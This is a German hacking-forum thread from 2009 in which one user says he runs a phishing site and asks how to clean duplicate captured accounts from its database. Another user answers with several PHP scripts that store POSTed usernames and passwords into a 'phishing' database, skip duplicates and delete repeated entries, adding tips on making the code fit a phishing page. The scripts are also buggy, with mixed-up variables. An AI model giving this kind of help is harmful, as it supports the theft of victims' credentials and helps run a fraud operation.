tach
ich hatte mal eine phishing seite eröffnet nur ich hatte leider nicht von anfang an ein script drin das doppelte einträge verhindert.
weis jemand wie ich die db bereinigen könnte so das dort keine duplikate auftauchen?
MFG 113puma
Ergebnis 1 bis 10 von 14
-
04.08.2009, 23:50 #1Anfänger
- Registriert seit
- 20.04.2009
- Beiträge
- 26
DB von doppelten oder mehrfachen einträgen bereinigen
-
05.08.2009, 00:34 #2Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Hier mal ein Beispielscript, was ich mal eben gezimmert habe, weiß nur nicht, obs funktioniert. Keine Zeit zum testen
. Prinzip sollte aber wohl klar sein.
Musst Du vllt. noch etwas umstellen, have Fun.PHP-Code:<?php
$host = "127.0.0.1:3306";
$user = "root";
$pw = "phpmyadmin";
$db = "phishing";
$con = @mysql_connect($host,$user,$pw);
@mysql_select_db($db);
$user = htmlentities($_POST['user']); //Mit Deinen POST-Daten austauschen!
$pw = htmlentities($_POST['pw']); //Dito
if(!$con) {
die("Connectien denied for user ".$user." at ".$host."!");
} else {
$query = "SELECT * FROM `phishing`.`beispielseite` WHERE `beispielseite`.`user` LIKE '".$user."' AND `beispielseite`.`password` LIKE '".$user."'";
$res = @mysql_query($query);
if(mysql_num_rows($res) == "0") {
//Eintrag ist noch _nicht_ in der Datenbank
$query = "INSERT INTO `phising`.`beispielseite` (user,password) VALUES ('".$user."','".$password."');";
$ret = @mysql_query($query);
if($ret) {
print "Eingetragen!";
} else {
print "Fehler";
}
} else {
//Eintrag existiert schon
exit;
}
}
?>Geändert von VeN0m (05.08.2009 um 00:40 Uhr)
Come to the dark side - We have cookies
-
05.08.2009, 01:52 #3Anfänger
- Registriert seit
- 20.04.2009
- Beiträge
- 26
wenn cih es ausführe kommt:
das script sieht jetzt so aus:Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/export/www/vhosts/funnetwork/hosting/114puma/sauber.php on line 23
FehlerPHP-Code:<?php
$host = "localhost";
$user = "114puma";
$pw = "....";
$db = "114puma";
$con = @mysql_connect($host,$user,$pw);
@mysql_select_db($db);
$user = htmlentities($_POST['user']); //Mit Deinen POST-Daten austauschen!
$pw = htmlentities($_POST['pwd']); //Dito
if(!$con) {
die("Connectien denied for user ".$user." at ".$host."!");
} else {
$query = "SELECT * FROM `114puma`.`base` WHERE `base`.`user` LIKE '".$user."' AND `beispielseite`.`password` LIKE '".$user."'";
$res = @mysql_query($query);
if(mysql_num_rows($res) == "0") {
//Eintrag ist noch _nicht_ in der Datenbank
$query = "INSERT INTO `114puma`.`base` (user,password) VALUES ('".$user."','".$password."');";
$ret = @mysql_query($query);
if($ret) {
print "Eingetragen!";
} else {
print "Fehler";
}
} else {
//Eintrag existiert schon
exit;
}
}
?>
kann es sein das ich irgendwo was falsches geändert habe?
-
05.08.2009, 01:58 #4Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Denkfehler... Naja, weiß gerade nicht, woran es liegt.
Dann so:
Habe noch mysql_real_escape_string() hinzugefügt, vergaß ich vorhin. Ist für den Fehler aber irrelevant.PHP-Code:<?php
$host = "localhost";
$user = "114puma";
$pw = "....";
$db = "114puma";
$con = @mysql_connect($host,$user,$pw);
@mysql_select_db($db);
$user = mysql_real_escape_string(htmlentities($_POST['user'])); //Mit Deinen POST-Daten austauschen!
$pw = mysql_real_escape_string(htmlentities($_POST['pwd'])); //Dito
if(!$con) {
die("Connectien denied for user ".$user." at ".$host."!");
} else {
$query = "SELECT count(*) FROM `114puma`.`base` WHERE `base`.`user` LIKE '".$user."' AND `beispielseite`.`password` LIKE '".$user."'";
$res = mysql_query($query);
$row = mysql_fetch_row($res);
if($row[0] == "0") {
//Eintrag ist noch _nicht_ in der Datenbank
$query = "INSERT INTO `114puma`.`base` (user,password) VALUES ('".$user."','".$password."');";
$ret = @mysql_query($query);
if($ret) {
print "Eingetragen!";
} else {
print "Fehler";
}
} else {
//Eintrag existiert schon
exit;
}
}
?>Geändert von VeN0m (05.08.2009 um 02:01 Uhr)
Come to the dark side - We have cookies
-
05.08.2009, 02:06 #5Anfänger
- Registriert seit
- 20.04.2009
- Beiträge
- 26
jez kommt :
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/export/www/vhosts/funnetwork/hosting/114puma/sauber.php on line 24Geändert von 113puma (05.08.2009 um 02:09 Uhr)
-
05.08.2009, 02:26 #6Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Gib mir mal eben zehn Minuten - Ich teste das...
Ich editiere dann.
EDIT:
Kann man mit den ganzen die()'s aber so natürlich bei einer Phishingseite nicht verwenden! ^^PHP-Code:<?php
$host = "localhost";
$user = "root";
$pw = "";
$db = "";
$con = @mysql_connect($host,$user,$pw);
@mysql_select_db($db);
$user = mysql_real_escape_string(htmlentities($_POST['user'])); //Mit Deinen POST-Daten austauschen!
$pw = mysql_real_escape_string(htmlentities($_POST['pwd'])); //Dito
if(!$con) {
die("Connectien denied for user ".$user." at ".$host."!");
} else {
$query = "SELECT * FROM `bla`.`beispielseite` WHERE `beispielseite`.`user` LIKE '".$user."' AND `beispielseite`.`password` LIKE '".$password."'";
$res = mysql_query($query);
$row = mysql_fetch_row($res);
if(mysql_num_rows($res) == "0") {
//Eintrag ist noch _nicht_ in der Datenbank
$query = "INSERT INTO `bla`.`beispielseite` (user,password) VALUES ('".$user."','".$password."');";
$ret = @mysql_query($query);
if($ret) {
print "Eingetragen!";
} else {
print "Fehler";
}
} else {
//Eintrag existiert schon
die("Eintrag existiert schon!");
}
}
?>
Ich denke der Fehler lag daran, dass a) ich beim password $user übergeben habe (bei der Abfrage) und b) Du mein zweites "beispielseite" nicht gegen Deine Tabelle ersetzt hast.
Musst wieder Deine Daten eintragen (steht jetzt auf Beispiel wieder ^^), vergiss aber das Passwortfeld nicht. Ich hätte das für Dich schon gemacht, wenn ich wüsste, wie dieses bei Dir heißt.
Geändert von VeN0m (05.08.2009 um 02:43 Uhr)
Come to the dark side - We have cookies
-
05.08.2009, 02:29 #7Anfänger
- Registriert seit
- 20.04.2009
- Beiträge
- 26
kk
Geändert von 113puma (05.08.2009 um 02:40 Uhr)
-
05.08.2009, 02:40 #8Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Ich schreibe immer im Format `datenbank`.`tabelle` und `tabelle`.`column`. Ein Column ist sowas wie "password" oder "user", "pwd" etc.
Und ja, in Deinem Fall wäre pwd richtig. Ich wollte aber a) keine neue Tabelle bei mir auf dem localhost erstellen und b) nicht von meiner Gewohnheit "password" zu verwenden abweichen. Passe das Script einfach so an, dass es passt. Bei mir geht es perfekt - Probiere also so lange, bis die Daten stimmen .
EDIT: Habe noch was geändert, siehe oben.Geändert von VeN0m (05.08.2009 um 02:43 Uhr)
Come to the dark side - We have cookies
-
05.08.2009, 02:51 #9Anfänger
- Registriert seit
- 20.04.2009
- Beiträge
- 26
oh
ich glaub du hast was falsch verstanden das script das die doppelten accs verhinderht habe ich schon
ich bräuchte eins das die doppelten accs entfernt
sory das mir das ers so spät aufgefallen ist ich bin ein idiotGeändert von 113puma (05.08.2009 um 02:57 Uhr)
-
05.08.2009, 03:14 #10Kevin Lee Poulsen
- Registriert seit
- 30.12.2008
- Beiträge
- 1.270
Nicht schlimm...
*GÄHN*PHP-Code:<?php
$host = "localhost";
$user = "root";
$pw = "password";
$db = "datenbank";
$con = @mysql_connect($host,$user,$pw);
@mysql_select_db($db);
if(!$con) {
die("Connectien denied for user ".$user." at ".$host."!");
} else {
$query = "SELECT * FROM `datenbank`.`tabelle`";
$res = mysql_query($query);
$all = array();
while($row = mysql_fetch_row($res)) {
if(in_array($row[1],$all)) {
$query = "DELETE FROM `datenbank`.`tabelle` WHERE `tabelle`.`id` = '".$row[0]."'";
mysql_query($query);
continue;
}
$all[$row[0]] = $row[1];
}
print_r($all);
}
?>Geändert von VeN0m (05.08.2009 um 03:17 Uhr)
Come to the dark side - We have cookies
Zitieren
